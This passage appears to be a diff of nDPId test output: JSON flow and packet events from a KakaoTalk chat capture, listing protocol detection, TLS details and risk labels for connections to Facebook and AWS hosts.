-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="} -01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="} +00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7560000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035840,"flow_last_seen":1430069035840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 